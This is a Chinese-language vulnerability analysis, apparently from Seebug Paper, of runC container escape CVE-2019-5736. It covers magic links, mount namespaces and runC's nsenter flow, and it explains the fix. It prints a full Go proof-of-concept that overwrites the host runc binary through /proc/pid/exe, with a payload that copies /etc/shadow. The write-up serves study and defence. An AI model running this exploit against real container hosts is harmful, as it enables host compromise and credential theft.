容器進程切換思考

作者：時鐘@RainSec
本文為作者投稿，Seebug Paper 期待你的分享，凡經采用即有禮品相送！投稿郵箱：paper@seebug.org

前置技術

Magic Link

/proc/目錄下存在很多的鏈接文件，但是在Linux 也存在一種特殊的鏈接文件，這種文件的大小為0，我們知道普通的鏈接文件的大小等于鏈接目標的文件路徑長度，但是Magic Link的大小為0，它們在打開方式上面也存在差別，普通鏈接文件會解析出鏈接文件的路徑然后進行打開操作，但是Magic LInk的話不會這樣，它會調用內核專門的處理函數，然后返回目標文件的文件描述符。

匿名文件

Linux Anonymous Files，也叫匿名文件，匿名文件和普通的文件十分類似，可以被定義，修改，寫入，讀取等等，但是和普通文件不同的是它并不是一個實體的文件，當用戶使用memfd_create創建一個匿名文件的時候會返回一個文件描述符，一旦對這個文件描述符的所有引用都被丟棄的時候，該匿名文件就會被銷毀，而且在該文件的整個生命周期中都是存在于內存的RAM當中，并不具備實體的文件。

mount namespace是如何實現的？

首先要了解在內核進程結構體task_struct里面存在一個nsproxy成員：

    struct task_struct {
    .........
    /* Namespaces: */
    struct nsproxy          *nsproxy;
    .......
    }

nsproxy結構體如下：

struct nsproxy {
    atomic_t count;
    struct uts_namespace *uts_ns;
    struct ipc_namespace *ipc_ns;
    struct mnt_namespace *mnt_ns;
    struct pid_namespace *pid_ns_for_children;
    struct net       *net_ns;
    struct time_namespace *time_ns;
    struct time_namespace *time_ns_for_children;
    struct cgroup_namespace *cgroup_ns;
};

可以看到各種不同的namespace都有自己的相關結構體，但是本文著重介紹mount namespace相關實現，因此通過追蹤內核中進程的創建過程發現mount namespace的實現如下：

內核函數調用鏈：

kernel_clone(_do_fork) -> copy_process

在copy_process中發現大量和namespace相關的信息：

static __latent_entropy struct task_struct *copy_process(
                    struct pid *pid,
                    int trace,
                    int node,
                    struct kernel_clone_args *args)
{
    int pidfd = -1, retval;
    struct task_struct *p;
    struct multiprocess_signals delayed;
    struct file *pidfile = NULL;
    u64 clone_flags = args->flags;
    struct nsproxy *nsp = current->nsproxy;

    /*
     * Don't allow sharing the root directory with processes in a different
     * namespace
     */
    if ((clone_flags & (CLONE_NEWNS|CLONE_FS)) == (CLONE_NEWNS|CLONE_FS))
        return ERR_PTR(-EINVAL);

    if ((clone_flags & (CLONE_NEWUSER|CLONE_FS)) == (CLONE_NEWUSER|CLONE_FS))
        return ERR_PTR(-EINVAL);
......
}

可以看到其實進程間的namespace可能具備某種繼承關系，因此自然聯想到系統0號進程，查閱相關資料發現存在init_task，它在內核剛啟動的時候就進行了初始化，而且在相關結構體里面也確實找到了對于nsproxy的初始化：

......
    .nsproxy    = &init_nsproxy,
......

init_nsproxy的相關定義如下：

struct nsproxy init_nsproxy = {
    .count          = ATOMIC_INIT(1),
    .uts_ns         = &init_uts_ns,
#if defined(CONFIG_POSIX_MQUEUE) || defined(CONFIG_SYSVIPC)
    .ipc_ns         = &init_ipc_ns,
#endif
    .mnt_ns         = NULL,
    .pid_ns_for_children    = &init_pid_ns,
#ifdef CONFIG_NET
    .net_ns         = &init_net,
#endif
#ifdef CONFIG_CGROUPS
    .cgroup_ns      = &init_cgroup_ns,
#endif
#ifdef CONFIG_TIME_NS
    .time_ns        = &init_time_ns,
    .time_ns_for_children   = &init_time_ns,
#endif
};

可以發現，mnt_ns的相關初始化函數是NULL，因此mnt_ns并不繼承父進程命名空間，回過頭來看之前的copy_namespaces函數，發現其中存在create_new_namespaces函數調用，在其中發現mnt_namespace確實是通過copy_mnt_ns函數新創建的，至此我們已經大致了解了整個mnt_namespace的實現和創建流程。同時，通過copy_mnt_ns函數大致了解到，其實就是提供了獨立的文件系統視圖，設置各種掛載點，因此只要幫助繞過視圖的影響就可以繞過mount namespace，所以符號鏈接攻擊一直也是容器的痛點問題之一。

runC nsenter模塊

在查看runC源碼的時候發現nsenter模塊，改模塊的主要實現使用C語言寫的，而且只在init.go的import中被引入，因此它的執行順序是很靠前的。

package nsenter

/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import "C"

在import "C"前面緊跟注釋是cgo的一種特殊語法，注釋里面包含的都是c語言的語法

漏洞分析

在容器中執行docker run或者docker exec的時候，最終結果都是runC驅動執行用戶想要執行的命令。同時，分析runC源碼發現，無論是runC run還是runC exec，一個比較核心的思想就是創建一個runner結構體，然后調用其實現的run()函數：

func execProcess(context *cli.Context) (int, error) {
    container, err := getContainer(context)
    if err != nil {
        return -1, err
    }
    status, err := container.Status()
    if err != nil {
        return -1, err
    }
    if status == libcontainer.Stopped {
        return -1, errors.New("cannot exec in a stopped container")
    }
    if status == libcontainer.Paused && !context.Bool("ignore-paused") {
        return -1, errors.New("cannot exec in a paused container (use --ignore-paused to override)")
    }
    path := context.String("process")
    if path == "" && len(context.Args()) == 1 {
        return -1, errors.New("process args cannot be empty")
    }
    state, err := container.State()
    if err != nil {
        return -1, err
    }
    bundle := utils.SearchLabels(state.Config.Labels, "bundle")
    p, err := getProcess(context, bundle)
    if err != nil {
        return -1, err
    }

    cgPaths, err := getSubCgroupPaths(context.StringSlice("cgroup"))
    if err != nil {
        return -1, err
    }

    r := &runner{
        enableSubreaper: false,
        shouldDestroy:   false,
        container:       container,
        consoleSocket:   context.String("console-socket"),
        detach:          context.Bool("detach"),
        pidFile:         context.String("pid-file"),
        action:          CT_ACT_RUN,
        init:            false,
        preserveFDs:     context.Int("preserve-fds"),
        subCgroupPaths:  cgPaths,
    }
    return r.run(p)
}

不過在此之前都會通過loadFactory類來創建基礎的libcontainer以便和容器進行交互，在exec.go中，getContainer的一個重要功能就是創建libccontainer實例：

// loadFactory returns the configured factory instance for execing containers.
func loadFactory(context *cli.Context) (libcontainer.Factory, error) {
    root := context.GlobalString("root")
    abs, err := filepath.Abs(root)
    if err != nil {
        return nil, err
    }

    intelRdtManager := libcontainer.IntelRdtFs

    // We resolve the paths for {newuidmap,newgidmap} from the context of runc,
    // to avoid doing a path lookup in the nsexec context. TODO: The binary
    // names are not currently configurable.
    newuidmap, err := exec.LookPath("newuidmap")
    if err != nil {
        newuidmap = ""
    }
    newgidmap, err := exec.LookPath("newgidmap")
    if err != nil {
        newgidmap = ""
    }

    return libcontainer.New(abs, intelRdtManager,
        libcontainer.CriuPath(context.GlobalString("criu")),
        libcontainer.NewuidmapPath(newuidmap),
        libcontainer.NewgidmapPath(newgidmap))
}

在結尾的New函數中，可以看到runC存儲了一個MagicLink作為InitPath:

// New returns a linux based container factory based in the root directory and
// configures the factory with the provided option funcs.
func New(root string, options ...func(*LinuxFactory) error) (Factory, error) {
    if root != "" {
        if err := os.MkdirAll(root, 0o700); err != nil {
            return nil, err
        }
    }
    l := &LinuxFactory{
        Root:      root,
        InitPath:  "/proc/self/exe",
        InitArgs:  []string{os.Args[0], "init"},
        Validator: validate.New(),
        CriuPath:  "criu",
    }

    for _, opt := range options {
        if opt == nil {
            continue
        }
        if err := opt(l); err != nil {
            return nil, err
        }
    }
    return l, nil
}

在接下來的過程中會調用該InitPath，并且參數為init，相當于執行了runC init命令，在該命令中采用cgo的形式導入C語言nstnter進行命名空間的設置：

package main

import (
    "os"
    "runtime"
    "strconv"

    "github.com/opencontainers/runc/libcontainer"
    _ "github.com/opencontainers/runc/libcontainer/nsenter"
    "github.com/sirupsen/logrus"
)
......

nsenter如下：

package nsenter

/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import "C"

可以看到調用了nsexec()函數，該函數在go runtime之前進行調用，函數的主要作用就是解析之前父進程發送的netlink格式的配置信息，然后通過設置usernamespace并創建子進程，然后子進程設置其他一些namespace并通過創建孫進程使相關namespaces生效，這個孫進程其實就是容器中的init進程，不過回想這個過程，runC通過cmd.Start()開啟一個子進程執行runC init，在runC init的nsenter包執行過程中，會首先設置自己的user namespace和pid namespace，這就使得在該過程中容器內本身存在的進程可以發現runC進程，因此：

void nsexec(void)
{
    int pipenum;
    jmp_buf env;
    int syncpipe[2];
    struct nlconfig_t config = {0};

    /*
     * If we don't have an init pipe, just return to the go routine.
     * We'll only get an init pipe for start or exec.
     */
    pipenum = initpipe();
    if (pipenum == -1)
        return;

    /* Parse all of the netlink configuration. */
    nl_parse(pipenum, &config);

    /* clone(2) flags are mandatory. */
    if (config.cloneflags == -1)
        bail("missing clone_flags");

    /* Pipe so we can tell the child when we've finished setting up. */
    if (pipe(syncpipe) < 0)
        bail("failed to setup sync pipe between parent and child");

    /* Set up the jump point. */
    if (setjmp(env) == JUMP_VAL) {
        /*
         * We're inside the child now, having jumped from the
         * start_child() code after forking in the parent.
         */
        uint8_t s = 0;
        int consolefd = config.consolefd;

        /* Close the writing side of pipe. */
        close(syncpipe[1]);

        /* Sync with parent. */
        if (read(syncpipe[0], &s, sizeof(s)) != sizeof(s) || s != SYNC_VAL)
            bail("failed to read sync byte from parent");

        if (setsid() < 0)
            bail("setsid failed");

        if (setuid(0) < 0)
            bail("setuid failed");

        if (setgid(0) < 0)
            bail("setgid failed");

        if (setgroups(0, NULL) < 0)
            bail("setgroups failed");

        if (consolefd != -1) {
            if (ioctl(consolefd, TIOCSCTTY, 0) < 0)
                bail("ioctl TIOCSCTTY failed");
            if (dup3(consolefd, STDIN_FILENO, 0) != STDIN_FILENO)
                bail("failed to dup stdin");
            if (dup3(consolefd, STDOUT_FILENO, 0) != STDOUT_FILENO)
                bail("failed to dup stdout");
            if (dup3(consolefd, STDERR_FILENO, 0) != STDERR_FILENO)
                bail("failed to dup stderr");
        }

        /* Free netlink data. */
        nl_free(&config);

        /* Finish executing, let the Go runtime take over. */
        return;
    }

    /* Run the parent code. */
    start_child(pipenum, &env, syncpipe, &config);

    /* Should never be reached. */
    bail("should never be reached");
}

如果，在runc啟動之前，容器內部的進程可以通過/proc/目錄觀察到runc相關的進程，那么就可以通過/proc/runc-pid/exe獲得runc具體的路徑，這個exe文件是Magic Link文件，這就意味著這個文件的打開過程是調用內核里面專門的處理函數，不是想普通的鏈接文件那樣找到目標鏈接文件打開，這其實就幫助我們繞過了mnt命名空間和chroot對容器中文件系統資源的限制。

如此我們就可以覆蓋掉原本的runc二進制文件為我們的惡意代碼，那么當用于下一次執行docker exec或者docker run之類需要調用runc的命令的時候就有可能會調用我們寫入的惡意文件從而實現宿主機上面的惡意代碼執行從而實現容器逃逸。

poc

package main

// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import (
        "fmt"
        "io/ioutil"
        "os"
        "strconv"
        "strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"

func main() {
        // First we overwrite /bin/sh with the /proc/self/exe interpreter path
        fd, err := os.Create("/bin/sh")
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Fprintln(fd, "#!/proc/self/exe")
        err = fd.Close()
        if err != nil {
                fmt.Println(err)
                return
        }
        fmt.Println("[+] Overwritten /bin/sh successfully")

        // Loop through all processes to find one whose cmdline includes runcinit
        // This will be the process created by runc
        var found int
        for found == 0 {
                pids, err := ioutil.ReadDir("/proc")
                if err != nil {
                        fmt.Println(err)
                        return
                }
                for _, f := range pids {
                        fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
                        fstring := string(fbytes)
                        if strings.Contains(fstring, "runc") {
                                fmt.Println("[+] Found the PID:", f.Name())
                                found, err = strconv.Atoi(f.Name())
                                if err != nil {
                                        fmt.Println(err)
                                        return
                                }
                        }
                }
        }

        // We will use the pid to get a file handle for runc on the host.
        var handleFd = -1
        for handleFd == -1 {
                // Note, you do not need to use the O_PATH flag for the exploit to work.
                handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
                if int(handle.Fd()) > 0 {
                        handleFd = int(handle.Fd())
                }
        }
        fmt.Println("[+] Successfully got the file handle")

        // Now that we have the file handle, lets write to the runc binary and overwrite it
        // It will maintain it's executable flag
        for {
                writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
                if int(writeHandle.Fd()) > 0 {
                        fmt.Println("[+] Successfully got write handle", writeHandle)
                        writeHandle.Write([]byte(payload))
                        return
                }
        }
}

POC思路：

首先覆蓋容器中的/bin/sh為#!/proc/self/exe。
遍歷/proc下的目錄找到runC相關進程
打開/proc下相關的exe文件獲得fd
循環寫入 fd，直到runC解除占用，成功寫入
runc最后將執行用戶通過docker exec指定的/bin/sh，它的內容在第1步中已經被替換成#!/proc/self/exe，因此實際上將執行宿主機上的runc，而runc也已經在第4部中被我們覆蓋掉了。

漏洞補丁

具體補丁詳情：https://github.com/opencontainers/runc/commit/6635b4f0c6af3810594d2770f662f34ddc15b40d

void nsexec(void)
{
    int pipenum;
    @@ -549,6 +552,14 @@ void nsexec(void)
    if (pipenum == -1)
        return;

    /*
     * We need to re-exec if we are not in a cloned binary. This is necessary
     * to ensure that containers won't be able to access the host binary
     * through /proc/self/exe. See CVE-2019-5736.
     */
    if (ensure_cloned_binary() < 0)
        bail("could not ensure we are a cloned binary");

    /* Parse all of the netlink configuration. */
    nl_parse(pipenum, &config);

可以看到主要是增加了一個ensure_cloned_binary()函數的判斷其中主要的邏輯是通過memfd_create來將讓runc在容器內執行操作前首先將自己復制成為一個匿名文件，如此在可以達到原來效果的同時，/proc/self/exe無法觸達到原本的 runC二進制文件。

思考

為了對容器進行有效控制通過宿主機進行容器內外的進程切換其實是必然的，但是稍有不慎就會導致容器信息外帶在進程的上下文中，runC的這個漏洞是一個例子還有一個例子就是docker cp漏洞，它本身也是因為docker-tar進程將相關的共享庫內容外帶到了宿主機導致了容器逃逸，因此在考慮容器安全問題時，對這些危險進程的監控也是十分必要的。

Paper 本文由 Seebug Paper 發布，如需轉載請注明來源。本文地址：http://www.bjnorthway.com/1856/

Paper - 安全技術精粹